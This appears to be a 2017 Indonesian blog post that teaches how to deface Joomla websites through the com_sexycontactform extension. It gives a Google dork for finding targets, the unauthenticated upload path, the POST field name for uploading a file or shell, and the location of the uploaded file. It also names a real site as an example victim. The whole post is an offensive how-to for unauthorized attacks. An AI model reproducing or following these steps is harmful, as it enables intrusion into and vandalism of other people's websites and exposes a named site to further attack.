Cara Deface Dengan Com_Sexy

Cara Deface Dengan Com_Sexy

- Wednesday, April 19, 2017

Cara Deface Dengan Com_Sexy





Saya Akan Memberika Tutorial cara deface Upload File, Masih Di Cms Joomla :v



Dork : inurl:components/com_sexycontactform/  (Kreasikan Dorknya)
Exploit: /components/com_sexycontactform/fileupload/index.php

1. Cari Target Dengan Dork



2. Sudah Dapat Target Lalu Exploit www.target.com/components/com_sexycontactform/fileupload/index.php

Jika Di Exploit Muncul Kayak DI bawah Ni , Berarti Vuln 


3. Langsung Di Exploit Csrf Online.  Di Sini Coeg
*Copy Url Yg Sudah Di exploit www.target.com/components/com_sexycontactform/fileupload/index.php
*POST File Dengan Nama  files[]
*Cari File kalian Lalu Upload

4. Jika sudah Di Upload Muncul Tampilan Sperti Dibawah,  Jika Gagal Muncul Tulisan False



5. Aksess File /Shell Di www.target.com/components/com_sexycontactform/fileupload/files/namafile.html

Contoh: http://bufetecristiani.com.mx/components/com_sexycontactform/fileupload/files/z.html



NB: Saya Tidak Bisa Upoad Shell, Saya hanya upload file html

No comments

Post a Comment